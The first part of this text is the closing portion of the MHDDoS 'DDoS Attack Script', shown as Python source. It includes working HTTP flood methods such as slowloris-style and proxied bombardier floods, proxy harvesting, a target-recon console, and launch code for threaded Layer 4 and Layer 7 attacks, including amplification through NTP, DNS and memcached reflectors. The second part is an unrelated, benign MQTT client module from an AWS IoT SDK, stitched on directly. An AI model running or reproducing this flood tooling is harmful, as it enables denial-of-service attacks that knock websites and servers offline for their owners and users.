BYTES_SEND += Tools.sizeOfRequest(res)
Tools.safe_close(s)
def GSB(self):
payload = str.encode("%s %s?qs=%s HTTP/1.1\r\n" % (self._req_type,
self._target.raw_path_qs,
ProxyTools.Random.rand_str(6)) +
"Host: %s\r\n" % self._target.authority +
self.randHeadercontent +
'Accept-Encoding: gzip, deflate, br\r\n'
'Accept-Language: en-US,en;q=0.9\r\n'
'Cache-Control: max-age=0\r\n'
'Connection: Keep-Alive\r\n'
'Sec-Fetch-Dest: document\r\n'
'Sec-Fetch-Mode: navigate\r\n'
'Sec-Fetch-Site: none\r\n'
'Sec-Fetch-User: ?1\r\n'
'Sec-Gpc: 1\r\n'
'Pragma: no-cache\r\n'
'Upgrade-Insecure-Requests: 1\r\n\r\n')
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def NULL(self) -> None:
payload: Any = str.encode(self._payload +
"Host: %s\r\n" % self._target.authority +
"User-Agent: null\r\n" +
"Referrer: null\r\n" +
self.SpoofIP + "\r\n")
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def BOMB(self):
assert self._proxies, \
'This method requires proxies. ' \
'Without proxies you can use github.com/codesenberg/bombardier'
while True:
proxy = randchoice(self._proxies)
if proxy.type != ProxyType.SOCKS4:
break
res = run(
[
f'{bombardier_path}',
f'--connections={self._rpc}',
'--http2',
'--method=GET',
'--latencies',
'--timeout=30s',
f'--requests={self._rpc}',
f'--proxy={proxy}',
f'{self._target.human_repr()}',
],
stdout=PIPE,
)
if self._thread_id == 0:
print(proxy, res.stdout.decode(), sep='\n')
def SLOW(self):
payload: bytes = self.generate_payload()
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
while Tools.send(s, payload) and s.recv(1):
for i in range(self._rpc):
keep = str.encode("X-a: %d\r\n" % ProxyTools.Random.rand_int(1, 5000))
Tools.send(s, keep)
sleep(self._rpc / 15)
break
Tools.safe_close(s)
def select(self, name: str) -> None:
self.SENT_FLOOD = self.GET
if name == "POST":
self.SENT_FLOOD = self.POST
if name == "CFB":
self.SENT_FLOOD = self.CFB
if name == "CFBUAM":
self.SENT_FLOOD = self.CFBUAM
if name == "XMLRPC":
self.SENT_FLOOD = self.XMLRPC
if name == "BOT":
self.SENT_FLOOD = self.BOT
if name == "APACHE":
self.SENT_FLOOD = self.APACHE
if name == "BYPASS":
self.SENT_FLOOD = self.BYPASS
if name == "DGB":
self.SENT_FLOOD = self.DGB
if name == "OVH":
self.SENT_FLOOD = self.OVH
if name == "AVB":
self.SENT_FLOOD = self.AVB
if name == "STRESS":
self.SENT_FLOOD = self.STRESS
if name == "DYN":
self.SENT_FLOOD = self.DYN
if name == "SLOW":
self.SENT_FLOOD = self.SLOW
if name == "GSB":
self.SENT_FLOOD = self.GSB
if name == "NULL":
self.SENT_FLOOD = self.NULL
if name == "COOKIE":
self.SENT_FLOOD = self.COOKIES
if name == "PPS":
self.SENT_FLOOD = self.PPS
self._defaultpayload = (
self._defaultpayload +
"Host: %s\r\n\r\n" % self._target.authority).encode()
if name == "EVEN": self.SENT_FLOOD = self.EVEN
if name == "DOWNLOADER": self.SENT_FLOOD = self.DOWNLOADER
if name == "BOMB": self.SENT_FLOOD = self.BOMB
if name == "KILLER": self.SENT_FLOOD = self.KILLER
class ProxyManager:
@staticmethod
def DownloadFromConfig(cf, Proxy_type: int) -> Set[Proxy]:
providrs = [
provider for provider in cf["proxy-providers"]
if provider["type"] == Proxy_type or Proxy_type == 0
]
logger.info(f"{bcolors.WARNING}Downloading Proxies from {bcolors.OKBLUE}%d{bcolors.WARNING} Providers{bcolors.RESET}" % len(providrs))
proxes: Set[Proxy] = set()
with ThreadPoolExecutor(len(providrs)) as executor:
future_to_download = {
executor.submit(
ProxyManager.download, provider,
ProxyType.stringToProxyType(str(provider["type"])))
for provider in providrs
}
for future in as_completed(future_to_download):
for pro in future.result():
proxes.add(pro)
return proxes
@staticmethod
def download(provider, proxy_type: ProxyType) -> Set[Proxy]:
logger.debug(
f"{bcolors.WARNING}Proxies from (URL: {bcolors.OKBLUE}%s{bcolors.WARNING}, Type: {bcolors.OKBLUE}%s{bcolors.WARNING}, Timeout: {bcolors.OKBLUE}%d{bcolors.WARNING}){bcolors.RESET}" %
(provider["url"], proxy_type.name, provider["timeout"]))
proxes: Set[Proxy] = set()
with suppress(TimeoutError, exceptions.ConnectionError,
exceptions.ReadTimeout):
data = get(provider["url"], timeout=provider["timeout"]).text
try:
for proxy in ProxyUtiles.parseAllIPPort(
data.splitlines(), proxy_type):
proxes.add(proxy)
except Exception as e:
logger.error(f'Download Proxy Error: {(e.__str__() or e.__repr__())}')
return proxes
class ToolsConsole:
METHODS = {"INFO", "TSSRV", "CFIP", "DNS", "PING", "CHECK", "DSTAT"}
@staticmethod
def checkRawSocket():
with suppress(OSError):
with socket(AF_INET, SOCK_RAW, IPPROTO_TCP):
return True
return False
@staticmethod
def runConsole():
cons = f"{gethostname()}@MHTools:~#"
while 1:
cmd = input(cons + " ").strip()
if not cmd: continue
if " " in cmd:
cmd, args = cmd.split(" ", 1)
cmd = cmd.upper()
if cmd == "HELP":
print("Tools:" + ", ".join(ToolsConsole.METHODS))
print("Commands: HELP, CLEAR, BACK, EXIT")
continue
if (cmd == "E") or \
(cmd == "EXIT") or \
(cmd == "Q") or \
(cmd == "QUIT") or \
(cmd == "LOGOUT") or \
(cmd == "CLOSE"):
exit(-1)
if cmd == "CLEAR":
print("\033c")
continue
if not {cmd} & ToolsConsole.METHODS:
print(f"{cmd} command not found")
continue
if cmd == "DSTAT":
with suppress(KeyboardInterrupt):
ld = net_io_counters(pernic=False)
while True:
sleep(1)
od = ld
ld = net_io_counters(pernic=False)
t = [(last - now) for now, last in zip(od, ld)]
logger.info(
("Bytes Sent %s\n"
"Bytes Recived %s\n"
"Packets Sent %s\n"
"Packets Recived %s\n"
"ErrIn %s\n"
"ErrOut %s\n"
"DropIn %s\n"
"DropOut %s\n"
"Cpu Usage %s\n"
"Memory %s\n") %
(Tools.humanbytes(t[0]), Tools.humanbytes(t[1]),
Tools.humanformat(t[2]), Tools.humanformat(t[3]),
t[4], t[5], t[6], t[7], str(cpu_percent()) + "%",
str(virtual_memory().percent) + "%"))
if cmd in ["CFIP", "DNS"]:
print("Soon")
continue
if cmd == "CHECK":
while True:
with suppress(Exception):
domain = input(f'{cons}give-me-ipaddress# ')
if not domain: continue
if domain.upper() == "BACK": break
if domain.upper() == "CLEAR":
print("\033c")
continue
if (domain.upper() == "E") or \
(domain.upper() == "EXIT") or \
(domain.upper() == "Q") or \
(domain.upper() == "QUIT") or \
(domain.upper() == "LOGOUT") or \
(domain.upper() == "CLOSE"):
exit(-1)
if "/" not in domain: continue
logger.info("please wait ...")
with get(domain, timeout=20) as r:
logger.info(('status_code: %d\n'
'status: %s') %
(r.status_code, "ONLINE"
if r.status_code <= 500 else "OFFLINE"))
if cmd == "INFO":
while True:
domain = input(f'{cons}give-me-ipaddress# ')
if not domain: continue
if domain.upper() == "BACK": break
if domain.upper() == "CLEAR":
print("\033c")
continue
if (domain.upper() == "E") or \
(domain.upper() == "EXIT") or \
(domain.upper() == "Q") or \
(domain.upper() == "QUIT") or \
(domain.upper() == "LOGOUT") or \
(domain.upper() == "CLOSE"):
exit(-1)
domain = domain.replace('https://',
'').replace('http://', '')
if "/" in domain: domain = domain.split("/")[0]
print('please wait ...', end="\r")
info = ToolsConsole.info(domain)
if not info["success"]:
print("Error!")
continue
logger.info(("Country: %s\n"
"City: %s\n"
"Org: %s\n"
"Isp: %s\n"
"Region: %s\n") %
(info["country"], info["city"], info["org"],
info["isp"], info["region"]))
if cmd == "TSSRV":
while True:
domain = input(f'{cons}give-me-domain# ')
if not domain: continue
if domain.upper() == "BACK": break
if domain.upper() == "CLEAR":
print("\033c")
continue
if (domain.upper() == "E") or \
(domain.upper() == "EXIT") or \
(domain.upper() == "Q") or \
(domain.upper() == "QUIT") or \
(domain.upper() == "LOGOUT") or \
(domain.upper() == "CLOSE"):
exit(-1)
domain = domain.replace('https://',
'').replace('http://', '')
if "/" in domain: domain = domain.split("/")[0]
print('please wait ...', end="\r")
info = ToolsConsole.ts_srv(domain)
logger.info(f"TCP: {(info['_tsdns._tcp.'])}\n")
logger.info(f"UDP: {(info['_ts3._udp.'])}\n")
if cmd == "PING":
while True:
domain = input(f'{cons}give-me-ipaddress# ')
if not domain: continue
if domain.upper() == "BACK": break
if domain.upper() == "CLEAR":
print("\033c")
if (domain.upper() == "E") or \
(domain.upper() == "EXIT") or \
(domain.upper() == "Q") or \
(domain.upper() == "QUIT") or \
(domain.upper() == "LOGOUT") or \
(domain.upper() == "CLOSE"):
exit(-1)
domain = domain.replace('https://',
'').replace('http://', '')
if "/" in domain: domain = domain.split("/")[0]
logger.info("please wait ...")
r = ping(domain, count=5, interval=0.2)
logger.info(('Address: %s\n'
'Ping: %d\n'
                                'Accepted Packets: %d/%d\n'
'status: %s\n') %
(r.address, r.avg_rtt, r.packets_received,
r.packets_sent,
"ONLINE" if r.is_alive else "OFFLINE"))
@staticmethod
def stop():
        print('All attacks have been stopped!')
for proc in process_iter():
if proc.name() == "python.exe":
proc.kill()
@staticmethod
def usage():
print((
'* MHDDoS - DDoS Attack Script With %d Methods\n'
'Note: If the Proxy list is empty, the attack will run without proxies\n'
' If the Proxy file doesn\'t exist, the script will download proxies and check them.\n'
' Proxy Type 0 = All in config.json\n'
' SocksTypes:\n'
' - 6 = RANDOM\n'
' - 5 = SOCKS5\n'
' - 4 = SOCKS4\n'
' - 1 = HTTP\n'
' - 0 = ALL\n'
' > Methods:\n'
' - Layer4\n'
' | %s | %d Methods\n'
' - Layer7\n'
' | %s | %d Methods\n'
' - Tools\n'
' | %s | %d Methods\n'
' - Others\n'
' | %s | %d Methods\n'
' - All %d Methods\n'
'\n'
'Example:\n'
' L7: python3 %s <method> <url> <socks_type> <threads> <proxylist> <rpc> <duration> <debug=optional>\n'
' L4: python3 %s <method> <ip:port> <threads> <duration>\n'
' L4 Proxied: python3 %s <method> <ip:port> <threads> <duration> <socks_type> <proxylist>\n'
' L4 Amplification: python3 %s <method> <ip:port> <threads> <duration> <reflector file (only use with'
' Amplification)>\n') %
(len(Methods.ALL_METHODS) + 3 + len(ToolsConsole.METHODS),
", ".join(Methods.LAYER4_METHODS), len(Methods.LAYER4_METHODS),
", ".join(Methods.LAYER7_METHODS), len(Methods.LAYER7_METHODS),
", ".join(ToolsConsole.METHODS), len(ToolsConsole.METHODS),
", ".join(["TOOLS", "HELP", "STOP"]), 3,
len(Methods.ALL_METHODS) + 3 + len(ToolsConsole.METHODS),
argv[0], argv[0], argv[0], argv[0]))
# noinspection PyBroadException
@staticmethod
def ts_srv(domain):
records = ['_ts3._udp.', '_tsdns._tcp.']
DnsResolver = resolver.Resolver()
DnsResolver.timeout = 1
DnsResolver.lifetime = 1
Info = {}
for rec in records:
try:
srv_records = resolver.resolve(rec + domain, 'SRV')
for srv in srv_records:
Info[rec] = str(srv.target).rstrip('.') + ':' + str(
srv.port)
except:
Info[rec] = 'Not found'
return Info
# noinspection PyUnreachableCode
@staticmethod
def info(domain):
with suppress(Exception), get("https://ipwhois.app/json/%s/" % domain) as s:
return s.json()
return {"success": False}
def handleProxyList(con, proxy_li, proxy_ty, url=None):
if proxy_ty not in {4, 5, 1, 0, 6}:
exit("Socks Type Not Found [4, 5, 1, 0, 6]")
if proxy_ty == 6:
proxy_ty = randchoice([4, 5, 1])
if not proxy_li.exists():
logger.warning(f"{bcolors.WARNING}The file doesn't exist, creating files and downloading proxies.{bcolors.RESET}")
proxy_li.parent.mkdir(parents=True, exist_ok=True)
with proxy_li.open("w") as wr:
Proxies: Set[Proxy] = ProxyManager.DownloadFromConfig(con, proxy_ty)
logger.info(
f"{bcolors.OKBLUE}{len(Proxies):,}{bcolors.WARNING} Proxies are getting checked, this may take awhile{bcolors.RESET}!"
)
Proxies = ProxyChecker.checkAll(
Proxies, timeout=1, threads=threads,
url=url.human_repr() if url else "http://httpbin.org/get",
)
if not Proxies:
exit(
"Proxy Check failed, Your network may be the problem"
" | The target may not be available."
)
stringBuilder = ""
for proxy in Proxies:
stringBuilder += (proxy.__str__() + "\n")
wr.write(stringBuilder)
proxies = ProxyUtiles.readFromFile(proxy_li)
if proxies:
logger.info(f"{bcolors.WARNING}Proxy Count: {bcolors.OKBLUE}{len(proxies):,}{bcolors.RESET}")
else:
logger.info(
f"{bcolors.WARNING}Empty Proxy File, running flood witout proxy{bcolors.RESET}")
proxies = None
return proxies
if __name__ == '__main__':
with open(__dir__ / "config.json") as f:
con = load(f)
with suppress(KeyboardInterrupt):
with suppress(IndexError):
one = argv[1].upper()
if one == "HELP":
raise IndexError()
if one == "TOOLS":
ToolsConsole.runConsole()
if one == "STOP":
ToolsConsole.stop()
method = one
host = None
port= None
url = None
event = Event()
event.clear()
target = None
urlraw = argv[2].strip()
if not urlraw.startswith("http"):
urlraw = "http://" + urlraw
if method not in Methods.ALL_METHODS:
exit("Method Not Found %s" %
", ".join(Methods.ALL_METHODS))
if method in Methods.LAYER7_METHODS:
url = URL(urlraw)
host = url.host
try:
host = gethostbyname(url.host)
except Exception as e:
exit('Cannot resolve hostname ', url.host, e)
threads = int(argv[4])
rpc = int(argv[6])
timer = int(argv[7])
proxy_ty = int(argv[3].strip())
proxy_li = Path(__dir__ / "files/proxies/" /
argv[5].strip())
useragent_li = Path(__dir__ / "files/useragent.txt")
referers_li = Path(__dir__ / "files/referers.txt")
bombardier_path = Path.home() / "go/bin/bombardier"
proxies: Any = set()
if method == "BOMB":
assert (
bombardier_path.exists()
or bombardier_path.with_suffix('.exe').exists()
), (
"Install bombardier: "
"https://github.com/MHProDev/MHDDoS/wiki/BOMB-method"
)
if len(argv) == 9:
logger.setLevel("DEBUG")
if not useragent_li.exists():
exit("The Useragent file doesn't exist ")
if not referers_li.exists():
exit("The Referer file doesn't exist ")
uagents = set(a.strip()
for a in useragent_li.open("r+").readlines())
referers = set(a.strip()
for a in referers_li.open("r+").readlines())
if not uagents: exit("Empty Useragent File ")
if not referers: exit("Empty Referer File ")
if threads > 1000:
logger.warning("Thread is higher than 1000")
if rpc > 100:
logger.warning(
"RPC (Request Pre Connection) is higher than 100")
proxies = handleProxyList(con, proxy_li, proxy_ty, url)
for thread_id in range(threads):
HttpFlood(thread_id, url, host, method, rpc, event,
uagents, referers, proxies).start()
if method in Methods.LAYER4_METHODS:
target = URL(urlraw)
port = target.port
target = target.host
try:
target = gethostbyname(target)
except Exception as e:
exit('Cannot resolve hostname ', url.host, e)
if port > 65535 or port < 1:
exit("Invalid Port [Min: 1 / Max: 65535] ")
if method in {"NTP", "DNS", "RDP", "CHAR", "MEM", "CLDAP", "ARD", "SYN"} and \
not ToolsConsole.checkRawSocket():
exit("Cannot Create Raw Socket")
threads = int(argv[3])
timer = int(argv[4])
proxies = None
ref = None
if not port:
logger.warning("Port Not Selected, Set To Default: 80")
port = 80
if len(argv) >= 6:
argfive = argv[5].strip()
if argfive:
refl_li = Path(__dir__ / "files" / argfive)
if method in {"NTP", "DNS", "RDP", "CHAR", "MEM", "CLDAP", "ARD"}:
if not refl_li.exists():
exit("The reflector file doesn't exist")
if len(argv) == 7:
logger.setLevel("DEBUG")
ref = set(a.strip()
for a in ProxyTools.Patterns.IP.findall(
refl_li.open("r+").read()))
if not ref: exit("Empty Reflector File ")
elif argfive.isdigit() and len(argv) >= 7:
if len(argv) == 8:
logger.setLevel("DEBUG")
proxy_ty = int(argfive)
proxy_li = Path(__dir__ / "files/proxies" / argv[6].strip())
proxies = handleProxyList(con, proxy_li, proxy_ty)
if method not in {"MINECRAFT", "MCBOT", "TCP", "CPS", "CONNECTION"}:
exit("this method cannot use for layer4 proxy")
else:
logger.setLevel("DEBUG")
for _ in range(threads):
Layer4((target, port), ref, method, event,
proxies).start()
logger.info(
f"{bcolors.WARNING}Attack Started to{bcolors.OKBLUE} %s{bcolors.WARNING} with{bcolors.OKBLUE} %s{bcolors.WARNING} method for{bcolors.OKBLUE} %s{bcolors.WARNING} seconds, threads:{bcolors.OKBLUE} %d{bcolors.WARNING}!{bcolors.RESET}"
% (target or url.host, method, timer, threads))
event.set()
ts = time()
while time() < ts + timer:
logger.debug(f'{bcolors.WARNING}Target:{bcolors.OKBLUE} %s,{bcolors.WARNING} Port:{bcolors.OKBLUE} %s,{bcolors.WARNING} Method:{bcolors.OKBLUE} %s{bcolors.WARNING} PPS:{bcolors.OKBLUE} %s,{bcolors.WARNING} BPS:{bcolors.OKBLUE} %s / %d%%{bcolors.RESET}' %
(target or url.host,
port or (url.port or 80),
method,
Tools.humanformat(int(REQUESTS_SENT)),
Tools.humanbytes(int(BYTES_SEND)),
round((time() - ts) / timer * 100, 2)))
REQUESTS_SENT.set(0)
BYTES_SEND.set(0)
sleep(1)
event.clear()
exit()
ToolsConsole.usage()
|
client.py
|
# Copyright (c) 2012-2014 Roger Light <roger@atchoo.org>
#
# All rights reserved. This program and the accompanying materials
# are made available under the terms of the Eclipse Public License v1.0
# and Eclipse Distribution License v1.0 which accompany this distribution.
#
# The Eclipse Public License is available at
# http://www.eclipse.org/legal/epl-v10.html
# and the Eclipse Distribution License is available at
# http://www.eclipse.org/org/documents/edl-v10.php.
#
# Contributors:
# Roger Light - initial API and implementation
"""
This is an MQTT v3.1 client module. MQTT is a lightweight pub/sub messaging
protocol that is easy to implement and suitable for low powered devices.
"""
import errno
import platform
import random
import select
import socket
HAVE_SSL = True
try:
import ssl
cert_reqs = ssl.CERT_REQUIRED
tls_version = ssl.PROTOCOL_TLSv1
except:
HAVE_SSL = False
cert_reqs = None
tls_version = None
import struct
import sys
import threading
import time
HAVE_DNS = True
try:
import dns.resolver
except ImportError:
HAVE_DNS = False
if platform.system() == 'Windows':
EAGAIN = errno.WSAEWOULDBLOCK
else:
EAGAIN = errno.EAGAIN
from libs.AWSIoTPythonSDK.core.protocol.connection.cores import ProgressiveBackOffCore
from libs.AWSIoTPythonSDK.core.protocol.connection.cores import SecuredWebSocketCore
from libs.AWSIoTPythonSDK.core.protocol.connection.alpn import SSLContextBuilder
VERSION_MAJOR=1
VERSION_MINOR=0
VERSION_REVISION=0
VERSION_NUMBER=(VERSION_MAJOR*1000000+VERSION_MINOR*1000+VERSION_REVISION)
MQTTv31 = 3
MQTTv311 = 4
if sys.version_info[0] < 3:
PROTOCOL_NAMEv31 = "MQIsdp"
PROTOCOL_NAMEv311 = "MQTT"
else:
PROTOCOL_NAMEv31 = b"MQIsdp"
PROTOCOL_NAMEv311 = b"MQTT"
PROTOCOL_VERSION = 3
# Message types
CONNECT = 0x10
CONNACK = 0x20
PUBLISH = 0x30
PUBACK = 0x40
PUBREC = 0x50
PUBREL = 0x60
PUBCOMP = 0x70
SUBSCRIBE = 0x80
SUBACK = 0x90
UNSUBSCRIBE = 0xA0
UNSUBACK = 0xB0
PINGREQ = 0xC0
PINGRESP = 0xD0
DISCONNECT = 0xE0
# Log levels
MQTT_LOG_INFO = 0x01
MQTT_LOG_NOTICE = 0x02
MQTT_LOG_WARNING = 0x04
MQTT_LOG_ERR = 0x08
MQTT_LOG_DEBUG = 0x10
# CONNACK codes
CONNACK_ACCEPTED = 0
CONNACK_REFUSED_PROTOCOL_VERSION = 1
CONNACK_REFUSED_IDENTIFIER_REJECTED = 2
CONNACK_REFUSED_SERVER_UNAVAILABLE = 3
CONNACK_REFUSED_BAD_USERNAME_PASSWORD = 4
CONNACK_REFUSED_NOT_AUTHORIZED = 5
# Connection state
mqtt_cs_new = 0
mqtt_cs_connected = 1
mqtt_cs_disconnecting = 2
mqtt_cs_connect_async = 3
# Message state
mqtt_ms_invalid = 0
mqtt_ms_publish= 1
mqtt_ms_wait_for_puback = 2
mqtt_ms_wait_for_pubrec = 3
mqtt_ms_resend_pubrel = 4
mqtt_ms_wait_for_pubrel = 5
mqtt_ms_resend_pubcomp = 6
mqtt_ms_wait_for_pubcomp = 7
mqtt_ms_send_pubrec = 8
mqtt_ms_queued = 9
# Error values
MQTT_ERR_AGAIN = -1
MQTT_ERR_SUCCESS = 0
MQTT_ERR_NOMEM = 1
MQTT_ERR_PROTOCOL = 2
MQTT_ERR_INVAL = 3
MQTT_ERR_NO_CONN = 4
MQTT_ERR_CONN_REFUSED = 5
MQTT_ERR_NOT_FOUND = 6
MQTT_ERR_CONN_LOST = 7
MQTT_ERR_TLS = 8
MQTT_ERR_PAYLOAD_SIZE = 9
MQTT_ERR_NOT_SUPPORTED = 10
MQTT_ERR_AUTH = 11
MQTT_ERR_ACL_DENIED = 12
MQTT_ERR_UNKNOWN = 13
MQTT_ERR_ERRNO = 14
# MessageQueueing DropBehavior
MSG_QUEUEING_DROP_OLDEST = 0
MSG_QUEUEING_DROP_NEWEST = 1
if sys.version_info[0] < 3:
sockpair_data = "0"
else:
sockpair_data = b"0"
def error_string(mqtt_errno):
"""Return the error string associated with an mqtt error number."""
if mqtt_errno == MQTT_ERR_SUCCESS:
return "No error."
elif mqtt_errno == MQTT_ERR_NOMEM:
return "Out of memory."
elif mqtt_errno == MQTT_ERR_PROTOCOL:
return "A network protocol error occurred when communicating with the broker."
elif mqtt_errno == MQTT_ERR_INVAL:
return "Invalid function arguments provided."
elif mqtt_errno == MQTT_ERR_NO_CONN:
return "The client is not currently connected."
elif mqtt_errno == MQTT_ERR_CONN_REFUSED:
return "The connection was refused."
elif mqtt_errno == MQTT_ERR_NOT_FOUND:
return "Message not found (internal error)."
elif mqtt_errno == MQTT_ERR_CONN_LOST:
return "The connection was lost."
elif mqtt_errno == MQTT_ERR_TLS:
return "A TLS error occurred."
elif mqtt_errno == MQTT_ERR_PAYLOAD_SIZE:
return "Payload too large."
elif mqtt_errno == MQTT_ERR_NOT_SUPPORTED:
return "This feature is not supported."
elif mqtt_errno == MQTT_ERR_AUTH:
return "Authorisation failed."
elif mqtt_errno == MQTT_ERR_ACL_DENIED:
return "Access denied by ACL."
elif mqtt_errno == MQTT_ERR_UNKNOWN:
return "Unknown error."
elif mqtt_errno == MQTT_ERR_ERRNO:
return "Error defined by errno."
else:
return "Unknown error."
def connack_string(connack_code):
"""Return the string associated with a CONNACK result."""
if connack_code == 0:
return "Connection Accepted."
elif connack_code == 1:
return "Connection Refused: unacceptable protocol version."
elif connack_code == 2:
return "Connection Refused: identifier rejected."
elif connack_code == 3:
return "Connection Refused: broker unavailable."
elif connack_code == 4:
return "Connection Refused: bad user name or password."
elif connack_code == 5:
return "Connection Refused: not authorised."
else:
return "Connection Refused: unknown reason."
def topic_matches_sub(sub, topic):
"""Check whether a topic matches a subscription.
For example:
foo/bar would match the subscription foo/# or +/bar
non/matching would not match the subscription non/+/+
"""
result = True
multilevel_wildcard = False
slen = len(sub)
tlen = len(topic)
if slen > 0 and tlen > 0:
if (sub[0] == '$' and topic[0] != '$') or (topic[0] == '$' and sub[0] != '$'):
return False
spos = 0
tpos = 0
while spos < slen and tpos < tlen:
if sub[spos] == topic[tpos]:
if tpos == tlen-1:
# Check for e.g. foo matching foo/#
if spos == slen-3 and sub[spos+1] == '/' and sub[spos+2] == '#':
result = True
multilevel_wildcard = True
break
spos += 1
tpos += 1
if tpos == tlen and spos == slen-1 and sub[spos] == '+':
spos += 1
result = True
break
else:
if sub[spos] == '+':
spos += 1
while tpos < tlen and topic[tpos] != '/':
tpos += 1
if tpos == tlen and spos == slen:
result = True
break
elif sub[spos] == '#':
multilevel_wildcard = True
if spos+1 != slen:
result = False
break
else:
result = True
break
else:
result = False
break
if not multilevel_wildcard and (tpos < tlen or spos < slen):
result = False
return result
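# A few illustrative results for topic_matches_sub (added for clarity, not part
# of the original source):
#   topic_matches_sub("foo/#", "foo/bar")         -> True
#   topic_matches_sub("+/bar", "foo/bar")         -> True
#   topic_matches_sub("non/+/+", "non/matching")  -> False
#   topic_matches_sub("$SYS/#", "foo/bar")        -> False ($-topics need an
#                                                    explicit $ subscription)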
def _socketpair_compat():
"""TCP/IP socketpair including Windows support"""
listensock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_IP)
listensock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
listensock.bind(("127.0.0.1", 0))
listensock.listen(1)
iface, port = listensock.getsockname()
sock1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_IP)
sock1.setblocking(0)
try:
sock1.connect(("127.0.0.1", port))
except socket.error as err:
if err.errno != errno.EINPROGRESS and err.errno != errno.EWOULDBLOCK and err.errno != EAGAIN:
raise
sock2, address = listensock.accept()
sock2.setblocking(0)
listensock.close()
return (sock1, sock2)
class MQTTMessage:
""" This is a class that describes an incoming message. It is passed to the
on_message callback as the message parameter.
Members:
topic : String. topic that the message was published on.
payload : String/bytes the message payload.
qos : Integer. The message Quality of Service 0, 1 or 2.
retain : Boolean. If true, the message is a retained message and not fresh.
mid : Integer. The message id.
"""
def __init__(self):
self.timestamp = 0
self.state = mqtt_ms_invalid
self.dup = False
self.mid = 0
self.topic = ""
self.payload = None
self.qos = 0
self.retain = False
class Client(object):
"""MQTT version 3.1/3.1.1 client class.
This is the main class for use communicating with an MQTT broker.
General usage flow:
* Use connect()/connect_async() to connect to a broker
* Call loop() frequently to maintain network traffic flow with the broker
* Or use loop_start() to set a thread running to call loop() for you.
* Or use loop_forever() to handle calling loop() for you in a blocking
* function.
* Use subscribe() to subscribe to a topic and receive messages
* Use publish() to send messages
* Use disconnect() to disconnect from the broker
Data returned from the broker is made available with the use of callback
functions as described below.
Callbacks
=========
A number of callback functions are available to receive data back from the
broker. To use a callback, define a function and then assign it to the
client:
def on_connect(client, userdata, flags, rc):
print("Connection returned " + str(rc))
client.on_connect = on_connect
All of the callbacks as described below have a "client" and an "userdata"
argument. "client" is the Client instance that is calling the callback.
"userdata" is user data of any type and can be set when creating a new client
instance or with user_data_set(userdata).
The callbacks:
on_connect(client, userdata, flags, rc): called when the broker responds to our connection
request.
flags is a dict that contains response flags from the broker:
flags['session present'] - this flag is useful for clients that are
using clean session set to 0 only. If a client with clean
session=0, that reconnects to a broker that it has previously
connected to, this flag indicates whether the broker still has the
session information for the client. If 1, the session still exists.
The value of rc determines success or not:
0: Connection successful
1: Connection refused - incorrect protocol version
2: Connection refused - invalid client identifier
3: Connection refused - server unavailable
4: Connection refused - bad username or password
5: Connection refused - not authorised
6-255: Currently unused.
on_disconnect(client, userdata, rc): called when the client disconnects from the broker.
The rc parameter indicates the disconnection state. If MQTT_ERR_SUCCESS
(0), the callback was called in response to a disconnect() call. If any
other value the disconnection was unexpected, such as might be caused by
a network error.
on_message(client, userdata, message): called when a message has been received on a
topic that the client subscribes to. The message variable is a
MQTTMessage that describes all of the message parameters.
on_publish(client, userdata, mid): called when a message that was to be sent using the
publish() call has completed transmission to the broker. For messages
with QoS levels 1 and 2, this means that the appropriate handshakes have
completed. For QoS 0, this simply means that the message has left the
client. The mid variable matches the mid variable returned from the
corresponding publish() call, to allow outgoing messages to be tracked.
This callback is important because even if the publish() call returns
success, it does not always mean that the message has been sent.
on_subscribe(client, userdata, mid, granted_qos): called when the broker responds to a
subscribe request. The mid variable matches the mid variable returned
from the corresponding subscribe() call. The granted_qos variable is a
list of integers that give the QoS level the broker has granted for each
of the different subscription requests.
on_unsubscribe(client, userdata, mid): called when the broker responds to an unsubscribe
request. The mid variable matches the mid variable returned from the
corresponding unsubscribe() call.
on_log(client, userdata, level, buf): called when the client has log information. Define
to allow debugging. The level variable gives the severity of the message
and will be one of MQTT_LOG_INFO, MQTT_LOG_NOTICE, MQTT_LOG_WARNING,
MQTT_LOG_ERR, and MQTT_LOG_DEBUG. The message itself is in buf.
"""
def __init__(self, client_id="", clean_session=True, userdata=None, protocol=MQTTv31, useSecuredWebsocket=False):
"""client_id is the unique client id string used when connecting to the
broker. If client_id is zero length or None, then one will be randomly
generated. In this case, clean_session must be True. If this is not the
case a ValueError will be raised.
clean_session is a boolean that determines the client type. If True,
the broker will remove all information about this client when it
disconnects. If False, the client is a persistent client and
subscription information and queued messages will be retained when the
client disconnects.
Note that a client will never discard its own outgoing messages on
disconnect. Calling connect() or reconnect() will cause the messages to
be resent. Use reinitialise() to reset a client to its original state.
userdata is user defined data of any type that is passed as the "userdata"
parameter to callbacks. It may be updated at a later point with the
user_data_set() function.
The protocol argument allows explicit setting of the MQTT version to
use for this client. Can be paho.mqtt.client.MQTTv311 (v3.1.1) or
paho.mqtt.client.MQTTv31 (v3.1), with the default being v3.1. If the
broker reports that the client connected with an invalid protocol
version, the client will automatically attempt to reconnect using v3.1
instead.
useSecuredWebsocket is a boolean that determines whether the client uses
MQTT over Websocket with sigV4 signing (True) or MQTT with plain TCP
socket. If True, the client will try to find AWS_ACCESS_KEY_ID and
AWS_SECRET_ACCESS_KEY in the system environment variables and start the
sigV4 signing and Websocket handshake. Under this configuration, all
outbound MQTT packets will be wrapped in WebSocket frames, and all
inbound MQTT packets will be automatically unwrapped from their WebSocket framing.
"""
if not clean_session and (client_id == "" or client_id is None):
raise ValueError('A client id must be provided if clean session is False.')
self._protocol = protocol
self._userdata = userdata
self._sock = None
self._sockpairR, self._sockpairW = _socketpair_compat()
self._keepalive = 60
self._message_retry = 20
self._last_retry_check = 0
self._clean_session = clean_session
if client_id == "" or client_id is None:
self._client_id = "paho/" + "".join(random.choice("0123456789ADCDEF") for x in range(23-5))
else:
self._client_id = client_id
self._username = ""
self._password = ""
self._in_packet = {
"command": 0,
"have_remaining": 0,
"remaining_count": [],
"remaining_mult": 1,
"remaining_length": 0,
"packet": b"",
"to_process": 0,
"pos": 0}
self._out_packet = []
self._current_out_packet = None
